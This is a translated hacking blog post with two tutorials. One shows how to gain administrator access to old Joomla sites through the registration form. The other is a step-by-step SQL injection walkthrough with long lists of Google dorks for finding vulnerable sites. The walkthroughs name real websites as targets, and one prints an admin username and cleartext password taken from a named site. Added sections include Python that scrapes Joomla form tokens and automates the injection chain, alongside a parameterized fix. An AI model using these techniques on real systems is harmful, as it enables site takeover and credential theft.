Sunday, September 29, 2013
Friday, September 27, 2013
COM_USER
Hi friends,
This morning, rather than sit bored in class, I thought I would write a tutorial; maybe it is useful.
This exploit is actually old, and a lot of people already use it :D
Here is the dork list (they match the sample-data URLs and the generator tag that a default Joomla 1.6/1.7 install leaves behind):
inurl:index.php/using-joomla/extensions/plugins site:.com
inurl:index.php/using/joomla site:com
inurl:index.php/using-joomla/extensions/components/content-component/article-category-list/50-upgraders
inurl:index.php/using-joomla/extensions/components/content-component/article-categories/28-park-site/photo-gallery
inurl:index.php/using-joomla/parameters/26-sample-data-articles/park-site
inurl:index.php/plugins site:com
inurl:index.php/rss=feed site:com
inurl:index.php/joomla/content/category-blog/24-joomla site:com
inurl:index.php/using-joomla/extensions/components/content-component/article-categories/84-gd-articles site:com
inurl:Home Page Beez joomla 1.6 index.php using-joomla
inurl:index.php joomla! 1.7 - open source content management site:
inurl:index.php/using-joomla/extension/components/content-component/article-category-list/50-upgraders site:com
intext:joomla! 1.7 - open source content management site:jp
inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:id
inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2 site:as
inurl:index.php/19-sample-data-articles/joomla site:com
inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/components/users-component/registration-form site:com
intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com
NB: develop the dorks further yourselves :)
Exploit: index.php?option=com_users&view=registration
You can download the exploit (here)
Straight to the first step:
Copy one of the dorks above into Google, Bing, etc.
Example dork I used:
intext:joomla! 1.7 - open source content management site:jp
Pick one of the sites :D
Then add the exploit path to the site's URL:
http://www.josuerodrigues.com.br/2013v2/index.php?option=com_users&view=registration
Then press Ctrl+U to view the page source, as in the picture below :D
Edit the exploit first :)
Replace the e-mail with your own e-mail.
Then copy the token and the site's URL into the exploit you downloaded.
Then save it and open it in your browser.
Click Register and something like this will appear:
wrong password
- The passwords you entered do not match. Please enter your desired password in the password field and confirm your entry by entering it in the confirm password field.
Enter a password you like again, then click Register.
If it succeeds it will look like this (this one is in Portuguese, the site is Brazilian :v)
BY. Rastaman Patah Hati
After that, open your e-mail :D and confirm by clicking the link in the message :)
Then we try to go to the administrator page :)
and log in with the username and password we just registered; if it worked you will land on the admin page.
Now it is up to you what you do with that site :)
That is all from me,
hope it is useful :)
BY. Rastaman Patah Hati
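As an added example, not from this post and not the downloaded exploit, here is what the "press Ctrl+U and copy the token" step amounts to in code: read the generator tag that the intext: dorks match on, the form action, and Joomla's anti-CSRF token out of a registration page, and assemble the ordinary registration POST. The page below is a constructed sample; the field names are those of the stock Joomla 1.6/1.7/2.5 com_users registration form, while the token value and the site path are made up. What the downloaded exploit changes in that form to end up with an administrator account is not described on this page and is not reproduced here. For the record, the bug behind this tutorial is the registration privilege escalation that Joomla fixed in the 2.5.3 release; the 1.6 and 1.7 branches the dorks look for were already end-of-life and never received that fix.

```python
import re
from urllib.parse import urlencode

# Constructed sample of a Joomla 1.7-era registration page, cut down to what the
# tutorial has you read out of the page source with Ctrl+U: the generator meta tag
# the intext: dorks key on, the form's action URL, and the hidden anti-CSRF token.
# Field names follow the stock com_users registration form; token and path are made up.
SAMPLE_PAGE = """<!DOCTYPE html>
<html><head>
<meta name="generator" content="Joomla! 1.7 - Open Source Content Management" />
<title>Registration</title>
</head><body>
<form id="member-registration" action="/index.php/using-joomla/extensions/components/users-component/registration-form" method="post" class="form-validate">
  <input type="text" name="jform[name]" id="jform_name" />
  <input type="text" name="jform[username]" id="jform_username" />
  <input type="password" name="jform[password1]" id="jform_password1" />
  <input type="password" name="jform[password2]" id="jform_password2" />
  <input type="text" name="jform[email1]" id="jform_email1" />
  <input type="text" name="jform[email2]" id="jform_email2" />
  <input type="hidden" name="option" value="com_users" />
  <input type="hidden" name="task" value="registration.register" />
  <input type="hidden" name="0123456789abcdef0123456789abcdef" value="1" />
</form>
</body></html>"""

GENERATOR_RE = re.compile(r'<meta\s+name="generator"\s+content="([^"]*)"', re.I)
VERSION_RE = re.compile(r"Joomla!\s*(\d+\.\d+)", re.I)
ACTION_RE = re.compile(r'<form[^>]*id="member-registration"[^>]*action="([^"]*)"', re.I)
# Joomla's form token is a hidden input whose *name* is the 32-hex-char token and whose value is 1.
TOKEN_RE = re.compile(r'<input\s+type="hidden"\s+name="([0-9a-f]{32})"\s+value="1"', re.I)


def joomla_generator(html):
    """The generator tag is what the intext:"joomla! 1.7 - open source ..." dorks match."""
    m = GENERATOR_RE.search(html)
    return m.group(1) if m else None


def joomla_version(html):
    m = VERSION_RE.search(joomla_generator(html) or "")
    return m.group(1) if m else None


def form_action(html):
    m = ACTION_RE.search(html)
    return m.group(1) if m else None


def registration_token(html):
    m = TOKEN_RE.search(html)
    return m.group(1) if m else None


def registration_body(html, name, username, email, password):
    """Build the POST body a normal registration sends. The token is tied to the
    session that fetched the page, so it has to come from that same fetch, which is
    why the tutorial has you copy it out of the source. password1 and password2 must
    match, or Joomla replies with the 'passwords you entered do not match' message
    seen in the tutorial."""
    token = registration_token(html)
    if token is None:
        raise ValueError("no form token found: registration is probably disabled")
    fields = {
        "jform[name]": name,
        "jform[username]": username,
        "jform[password1]": password,
        "jform[password2]": password,
        "jform[email1]": email,
        "jform[email2]": email,
        "option": "com_users",
        "task": "registration.register",
        token: "1",
    }
    return urlencode(fields)


if __name__ == "__main__":
    print(joomla_generator(SAMPLE_PAGE), joomla_version(SAMPLE_PAGE))
    print(form_action(SAMPLE_PAGE))
    print(registration_body(SAMPLE_PAGE, "Test User", "testuser", "test@example.com", "Passw0rd!"))
```

A page that yields a token here has public registration switched on; one that shows no form has it off, which, short of upgrading, was the one cheap mitigation a Joomla 1.6/1.7 administrator had against this class of bug.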
Tutorial Hacking with SQL bar
Tools: the Firefox browser. Why Firefox? Because we need to install the HackBar add-on, which [apparently] only exists for Firefox. What does HackBar look like? Here is a screenshot:
What does it do? Just follow the tutorial to the end and you will see what HackBar is for. If you have not installed HackBar yet, go to the following link:
https://addons.mozilla.org/id/firefox/addon/hackbar/
OK, let's start the tutorial:
Step 1:
Paste a dork into Google:
source.php?id=
dl.php?id=
service.php?id=
anime.php?id=
application.php?id=
plugin.php?id=
purchase.php?id=
report.php?id=
world.php?id=
overview.php?id=
journal.php?id=
static.php?id=
content.php?id=
projects.php?id=
record.php?id=
feed.php?id=
topic.php?id=
display_main.php?id=
blog.php?id=
subcatergory.php?id=
author.php?id=
inside.php?id=
popup2.php?id=
work.php?id=
trailers.php?id=
howto.php?id=
play.php?id=
press_release.php?id=
mirrors.php?id=
interview.php?id=
contribute.php?id=
entry.php?id=
standard.php?id=
country.php?id=
flash_games.php?id=
flash.php?id=
flashgames.php?id=
file.php?id=
skill.php?id=
links.php?id=
form.php?id=
single.php?id=
book.php?id=
node.php?id=
release.php?id=
trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
"id=" & intext:"Warning: mysql_fetch_array()"
"id=" & intext:"Warning: getimagesize()"
"id=" & intext:"Warning: session_start()"
"id=" & intext:"Warning: mysql_num_rows()"
"id=" & intext:"Warning: mysql_query()"
"id=" & intext:"Warning: array_merge()"
"id=" & intext:"Warning: preg_match()"
"id=" & intext:"Warning: filesize()"
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=
viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()"
"id=" & intext:"Warning: is_writable()"
"id=" & intext:"Warning: Unknown()"
"id=" & intext:"Warning: mysql_result()"
"id=" & intext:"Warning: pg_exec()"
"id=" & intext:"Warning: require()"
buy.php?category=
pageid=
page.php?file=
show.php?id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
select_biblio.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
loadpsb.php?id=
announce.php?id=
participant.php?id=
download.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
index.php?=
profile_view.php?id=
category.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
tradeCategory.php?id=
transcript.php?id=
item_id=
news-full.php?id=
aboutbook.php?id=
preview.php?id=
material.php?id=
read.php?id=
viewapp.php?id=
story.php?id=
newsone.php?id=
rubp.php?idr=
art.php?idm=
title.php?id=
index1.php?modo=
include.php?* *=
nota.php?pollname=
index3.php?p=
padrao.php?pre=
home.php?pa=
main.php?type=
sitio.php?start=
*.php?include=
general.php?xlink=
show.php?go=
nota.php?ki=
down*.php?oldal=
layout.php?disp=
enter.php?chapter=
base.php?incl=
enter.php?mod=
show.php?corpo=
head.php?* *=
info.php?strona=
template.php?str=
main.php?doshow=
view.php?* *=
index.php?to=
page.php?cmd=
view.php?b=
info.php?option=
show.php?x=
template.php?texto=
index3.php?ir=
print.php?chapter=
file.php?inc=
file.php?cont=
view.php?cmd=
include.php?chapter=
path.php?my=
principal.php?param=
general.php?menue=
index1.php?b=
info.php?chapter=
nota.php?chapter=
general.php?include=
start.php?addr=
index1.php?qry=
index1.php?loc=
page.php?addr=
index1.php?dir=
principal.php?pr=
press.php?seite=
head.php?cmd=
home.php?sec=
home.php?category=
standard.php?cmd=
mod*.php?thispage=
base.php?to=
view.php?choix=
base.php?panel=
template.php?mod=
info.php?j=
blank.php?pref=
sub*.php?channel=
standard.php?in=
general.php?cmd=
pagina.php?panel=
template.php?where=
path.php?channel=
gery.php?seccion=
page.php?tipo=
sitio.php?rub=
pagina.php?u=
file.php?ir=
*inc*.php?sivu=
path.php?start=
page.php?chapter=
home.php?recipe=
enter.php?pname=
layout.php?path=
print.php?open=
mod*.php?channel=
down*.php?phpbb_root_path=
*inc*.php?str=
gery.php?phpbb_root_path=
include.php?middlePart=
sub*.php?destino=
info.php?read=
home.php?sp=
main.php?strona=
sitio.php?get=
sitio.php?index=
index3.php?option=
enter.php?a=
main.php?second=
print.php?pname=
blank.php?itemnav=
blank.php?pagina=
index1.php?d=
down*.php?where=
*inc*.php?include=
path.php?pre=
home.php?loader=
start.php?eval=
index.php?disp=
head.php?mod=
sitio.php?section=
nota.php?doshow=
home.php?seite=
home.php?a=
page.php?url=
pagina.php?left=
layout.php?c=
principal.php?goto=
standard.php?base_dir=
home.php?where=
page.php?sivu=
*inc*.php?adresa=
padrao.php?str=
include.php?my=
show.php?home=
index.php?load=
index3.php?rub=
sub*.php?str=
start.php?index=
nota.php?mod=
sub*.php?mid=
index1.php?* *=
pagina.php?oldal=
padrao.php?loc=
padrao.php?rub=
page.php?incl=
gery.php?disp=
nota.php?oldal=
include.php?u=
principal.php?pagina=
print.php?choix=
head.php?filepath=
include.php?corpo=
sub*.php?action=
head.php?pname=
press.php?dir=
show.php?xlink=
file.php?left=
nota.php?destino=
general.php?module=
index3.php?redirect=
down*.php?param=
default.php?ki=
padrao.php?h=
padrao.php?read=
mod*.php?cont=
index1.php?l=
down*.php?pr=
gery.php?viewpage=
template.php?load=
nota.php?pr=
padrao.php?destino=
index2.php?channel=
principal.php?opcion=
start.php?str=
press.php?* *=
index.php?ev=
pagina.php?pre=
nota.php?content=
include.php?adresa=
sitio.php?t=
index.php?sivu=
principal.php?q=
path.php?ev=
print.php?module=
index.php?loc=
nota.php?basepath=
padrao.php?tipo=
index2.php?in=
principal.php?eval=
file.php?qry=
info.php?t=
enter.php?play=
general.php?var=
principal.php?s=
standard.php?pagina=
standard.php?subject=
base.php?second=
head.php?inc=
pagina.php?basepath=
main.php?pname=
*inc*.php?modo=
include.php?goto=
file.php?pg=
head.php?g=
general.php?header=
start.php?*root*=
enter.php?pref=
index3.php?open=
start.php?module=
main.php?load=
enter.php?pg=
padrao.php?redirect=
pagina.php?my=
gery.php?pre=
enter.php?w=
info.php?texto=
enter.php?open=
base.php?rub=
gery.php?* *=
include.php?cmd=
standard.php?dir=
layout.php?page=
index3.php?pageweb=
include.php?numero=
path.php?destino=
index3.php?home=
default.php?seite=
path.php?eval=
base.php?choix=
template.php?cont=
info.php?pagina=
default.php?x=
default.php?option=
You can come up with your own variations :D
Example website: http://target.com/content/research.php?cid=2
Add a single quote ['] or a tilde [~] at the end of the URL to check whether the site is vulnerable to SQLi: if the page throws a database error or its content changes, the parameter is going into the query unescaped.
So it becomes: http://target.com/content/research.php?cid=2'
Step 2:
Next, we find out how many columns the query selects, using "order by". Keep increasing the number until you get an error.
http://target.com/content/research.php?cid=2 order by 1-- normal
http://target.com/content/research.php?cid=2 order by 2-- normal
http://target.com/content/research.php?cid=2 order by 3-- normal
http://target.com/content/research.php?cid=2 order by 4-- normal
http://target.com/content/research.php?cid=2 order by 5-- normal
http://target.com/content/research.php?cid=2 order by 6-- ERROR
At "order by 6" we get the error: Unknown column '6' in 'order clause'. So we now know the query selects 5 columns (this is the column count of that one query, not the number of tables in the database).
Step 3:
Now we look for the "numbers" we can inject into in the next steps, using union select. Look at the URL below:
http://target.com/content/research.php?cid=-2 union select 1,2,3,4,5-- [remember to put a minus sign after ?cid=, so the real row is not returned and the page renders the row from our union instead]
The numbers 3 and 4 appear on the page.
Step 4:
Now we check the database version using those magic numbers, by putting "@@version" or "version()" in place of one of the numbers that appeared.
http://target.com/content/research.php?cid=-2 union select 1,2,version(),4,5 -- [because 3 was one of the numbers that appeared]
It shows 5.1.61. That is the MySQL server version (not the PHP version), and it is MySQL 5, so the tutorial can continue: from MySQL 5.0 on, the information_schema database lists every table and column, which the next steps rely on. On MySQL 4 there is no information_schema, so you would have to guess the table and column names yourself.
Step 5:
We list the tables in the database by replacing "version()" with "group_concat(table_name)" and adding "from information_schema.tables where table_schema=database()" after the last number, before the --
http://target.com/content/research.php?cid=-2 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()--
We see the tables admin, research, vcounter.
Step 6:
Now use some logic. Where is user and password data usually kept? The answer, of course, is the admin table. Let's look at the columns of that table.
This is where HackBar comes in: it converts a word into MySQL CHAR() form, so we can write the table name without quote characters (quotes are often escaped or filtered by the application). Click SQL -> MySQL -> MySQL CHAR() and convert the word "admin".
The result for "admin" is CHAR(97, 100, 109, 105, 110). (In MySQL the hex literal 0x61646d696e does the same job.)
Step 7:
The next step is to find the columns of the admin table. Replace "group_concat(table_name)" with "group_concat(column_name)", "information_schema.tables" with "information_schema.columns", and "table_schema=database()" with "table_name=[the CHAR() value from step 6]".
http://target.com/content/research.php?cid=-2 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
We get the columns aid, admin_id, admin_pass in the admin table.
Step 8:
Now we read the data in the columns aid, admin_id and admin_pass.
Replace "group_concat(column_name)" with group_concat(aid,0x3a,admin_id,0x3a,admin_pass), and replace "from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--" with "from admin--". Note the 0x3a: it is the hex form of ':', so the fields come back separated by ':'.
http://kkverma.com/content/research.php?cid=-2 union select 1,2,group_concat(aid,0x3a,admin_id,0x3a,admin_pass),4,5 from admin--
We get the following data:
aid : 1
Admin ID : admin
Admin Pass : bimogay
(Here the password is stored in clear text; more often you get a hash that still has to be cracked.)
Step 9:
Now we look for the login page. It is usually at a path containing "admin" or "login". If you do not feel like searching by hand, use an Admin Finder tool; look for one on Google.
We find the login page at:
http://target.com/admin (you can also find the admin page with Havij)
Enter the username and password from the data we obtained.
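As an added example (not from the original post and not HackBar's code), steps 2 to 8 above driven as a script against a constructed, deliberately vulnerable handler, with the parameterized fix beside it. sqlite3 stands in for MySQL so it runs offline: sqlite_master and pragma_table_info() replace information_schema.tables and information_schema.columns, and char(58) replaces the 0x3a literal, since sqlite has no hex string literal. The table and column names are the ones the walkthrough finds; every row, including the admin credentials, is made up.

```python
import re
import sqlite3

# Constructed stand-in for the tutorial's backend: the three tables the walkthrough
# finds (admin, research, vcounter), with research.php selecting five columns of
# which only two reach the page. All rows, credentials included, are made up.
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE research (cid INTEGER, title TEXT, abstract TEXT, author TEXT, year INTEGER);
        CREATE TABLE admin (aid INTEGER, admin_id TEXT, admin_pass TEXT);
        CREATE TABLE vcounter (hits INTEGER);
        INSERT INTO research VALUES (1, 'Paper one', 'Abstract one', 'A. Author', 2011);
        INSERT INTO research VALUES (2, 'Paper two', 'Abstract two', 'B. Author', 2012);
        INSERT INTO admin VALUES (1, 'admin', 's3cret');
    """)
    return con

QUERY = "SELECT cid, title, abstract, author, year FROM research WHERE cid="
VISIBLE = (3, 4)  # the template prints only columns 3 and 4 (abstract, author)

def render(rows):
    return "\n".join(f"{r[VISIBLE[0] - 1]} | {r[VISIBLE[1] - 1]}" for r in rows)

def research_page(con, cid):
    """Vulnerable handler: cid is pasted into the SQL text, the pattern behind
    every `something.php?id=` dork in the list above."""
    try:
        return render(con.execute(QUERY + cid).fetchall())
    except sqlite3.Error as exc:
        return f"ERROR: {exc}"  # verbose DB errors are what the ORDER BY probe reads

def research_page_safe(con, cid):
    """Fixed handler: validate the id as an integer and bind it as a parameter,
    so none of the payloads below is ever parsed as SQL."""
    try:
        cid_int = int(cid)
    except ValueError:
        return "bad request"
    return render(con.execute(QUERY + "?", (cid_int,)).fetchall())

# ---- attacker side: steps 2 to 8 of the walkthrough, driven through page() ----
def find_column_count(page, max_cols=20):
    """Step 2: ORDER BY n until the database complains; the last n that worked
    is the number of columns the query selects."""
    for n in range(1, max_cols + 1):
        if page(f"2 order by {n}--").startswith("ERROR"):
            return n - 1
    return None

def find_visible_columns(page, ncols):
    """Step 3: a negative cid empties the real result so the UNION row is what
    gets rendered; distinctive markers show which positions reach the page."""
    markers = ",".join(str(1000000 + i) for i in range(1, ncols + 1))
    out = page(f"-2 union select {markers}--")
    return sorted(int(m) for m in re.findall(r"100000(\d)", out))

def union_payload(ncols, slot, expr, tail=""):
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[slot - 1] = expr  # our expression goes into a slot the page reflects
    return "-2 union select " + ",".join(cols) + (" " + tail if tail else "") + "--"

def read_slot(out, slot, visible):
    return out.split(" | ")[visible.index(slot)]

def chars(word):
    """Step 6, HackBar's 'MySQL CHAR()': spell a string without quote characters."""
    return "char(" + ",".join(str(ord(c)) for c in word) + ")"

def list_tables(page, ncols, visible):
    """Step 5. sqlite_master stands in for information_schema.tables."""
    slot = visible[0]
    out = page(union_payload(ncols, slot, "group_concat(name)",
                             f"from sqlite_master where type={chars('table')}"))
    return sorted(read_slot(out, slot, visible).split(","))

def list_columns(page, ncols, visible, table):
    """Step 7. pragma_table_info() stands in for information_schema.columns."""
    slot = visible[0]
    out = page(union_payload(ncols, slot, "group_concat(name)",
                             f"from pragma_table_info({chars(table)})"))
    return read_slot(out, slot, visible).split(",")

def dump_table(page, ncols, visible, table, columns):
    """Step 8. MySQL's group_concat(a,0x3a,b) is a||char(58)||b in sqlite."""
    slot = visible[0]
    expr = "group_concat(" + "||char(58)||".join(columns) + ")"
    out = page(union_payload(ncols, slot, expr, f"from {table}"))
    return read_slot(out, slot, visible).split(",")

def run_walkthrough(con):
    page = lambda cid: research_page(con, cid)
    ncols = find_column_count(page)
    visible = find_visible_columns(page, ncols)
    cols = list_columns(page, ncols, visible, "admin")
    return {"columns": ncols, "visible": visible,
            "tables": list_tables(page, ncols, visible), "admin_columns": cols,
            "admin_rows": dump_table(page, ncols, visible, "admin", cols)}

if __name__ == "__main__":
    db = build_db()
    print(run_walkthrough(db))
    print(research_page_safe(db, "-2 union select 1,2,3,4,5--"))  # bad request
```

Two things the script makes concrete that the URLs alone do not: the whole chain depends on the page echoing the database's error text (step 2) and one of the selected columns (step 3), so suppressing SQL errors in production removes the cheap probe; and the fix is not in the payload filtering but in research_page_safe, where the id is validated and bound as a parameter, after which every one of the walkthrough's URLs returns "bad request".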